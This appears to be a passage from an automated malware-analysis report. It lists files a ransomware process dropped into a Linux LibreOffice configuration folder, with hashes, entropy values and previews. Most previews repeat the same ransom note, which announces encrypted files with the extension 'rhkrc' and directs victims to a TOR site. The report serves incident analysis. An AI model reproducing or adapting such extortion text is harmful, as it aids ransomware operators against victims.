                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.executable.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):349
                  Entropy (8bit):6.11188112531676
                  Encrypted:false
                  SSDEEP:6:HOEHqQY4PHYDZ15OppQsK11zmhOO/EUyp6XcijtKxoRzx0LIk:XZY4P4DxoQjL2DcUBjKxg2D
                  MD5:8914D3116FC1E4F162F8DD0E9FDB9C31
                  SHA1:BA2692F384D0D93962653BF457ADD831DEE21902
                  SHA-256:7DFC6F423CFADF071FC3D057898B53E24512B1C22BC0FEEEBF40F409C229FBA4
                  SHA-512:28223A67376A02B62E33201FC092A4EE9723059B561F3F9D09048CB7184276F7192B079D347BEBB3825460A610FBC5C164D5C5396273B4C6FDDC58E890F828C9
                  Malicious:false
                  Reputation:low
                  Preview: ..$... ..T.u,6..!..YJ.....W5. ...s..Yp..F.....'.2.W.z./...K..w..{.]/I.Q.|3).:.4....5...8...&......%.%C....<..].f...gi%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................a.;}...\N@..|.$.I.o........)..........":.............C..
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.script.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.sfwk.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/lastsynchronized
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):233
                  Entropy (8bit):4.861327024166902
                  Encrypted:false
                  SSDEEP:3:1/KHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1Ts0hqodoJKsrLIl/Pn:5K11zmhOO/EUyp6XcpdUzwR
                  MD5:88F2D7B95729220D921C7E1D79C29B60
                  SHA1:C1A129CD937693840A298B567604588DD59CC13C
                  SHA-256:953F511329CC39E7059E96196C5B6C26D82090017ED2095E1FB3E426BB7DAA22
                  SHA-512:61284EBAB4DCE53D21381A09C4A9E0A064522EABFA5D6033187F1D97D520B054B1A323EAB8F64FEE8034671BAC4A223219220EF95F6A1B1E962CEF728170B420
                  Malicious:false
                  Reputation:low
                  Preview: .%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................h.s..M.&R[.qz..Jba.A..92;W..8l.1...r.a_c..^..........m..
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.bundle.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.component.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):367
                  Entropy (8bit):6.141981952896471
                  Encrypted:false
                  SSDEEP:6:ANB+rzmZ8Yx3wBkeUW0osPA/Du11zmhOO/EUyp6XcdCO/6+t4:AWzmF3akejm4S2DcUBJF+t4
                  MD5:685556EB2CDEA2CC0DF4683B2869DC9C
                  SHA1:34D7254EFAFF72D9F13381B31F35018461751ED4
                  SHA-256:34A31D86320B1C5FC7A9FEBB8C0971A26B47644E8E355F5C2004524539E2F7E4
                  SHA-512:C48F37577D0186D751C2A4D35C528D92FA320AD0110B68C9EB18C9981BC004AA21CD91FAF87EAB9D97580365BBE94921DCEE1694BFF713C4C9FFB76D7614CF65
                  Malicious:false
                  Reputation:low
                  Preview: ......y....ur .{.`.Y|...qFiO.+.KN!U37|..SO.x.+..1...o.2_FT...%.../..5..+...[+mH/......P.-e.,o..{...}..,.2t..^z9.;3?'.{.}M].5...o...i...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................._.`s9..=..b^.c...F~...e+..%..=.D...P..............QQB
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.executable.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):349
                  Entropy (8bit):5.99693912045793
                  Encrypted:false
                  SSDEEP:6:LIyDqnMuVoTC0YgwhCU1zmhOO/EUyp6XcODAz+vY6oL:cIcMuVoTC0Ygwhr2DcUB7UaO
                  MD5:ED7DE9E12DDF4CBAE61840924A79CFF6
                  SHA1:345B2CFA5D23FB4F40D3ED859F3F883FA376956B
                  SHA-256:396DC7834CCB999FF4FF5CF56FEBB26BD589B79C40F8B38E8ABF2208DCC8BECA
                  SHA-512:4081FBEEF447BD331E5BB829DFDF3C719EFDDE98B776B7B74507492908FA83C3BC52D871F96A2C4440CA3544A45B429E33B86E7D1D7F1682F9252B183093BC26
                  Malicious:false
                  Reputation:low
                  Preview: .YX.qt.P6.+.V.+..t<..G.P.....yex..7dQ.......j....F..U..5..........v.....K..5.....3...:U.H.U.6.o.5...S)'..!..C......mt%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................6.....d.a6cbN..3.ld.E.. .?._Aa..s.p...G..$...........nl`
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.script.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.sfwk.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/registry/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
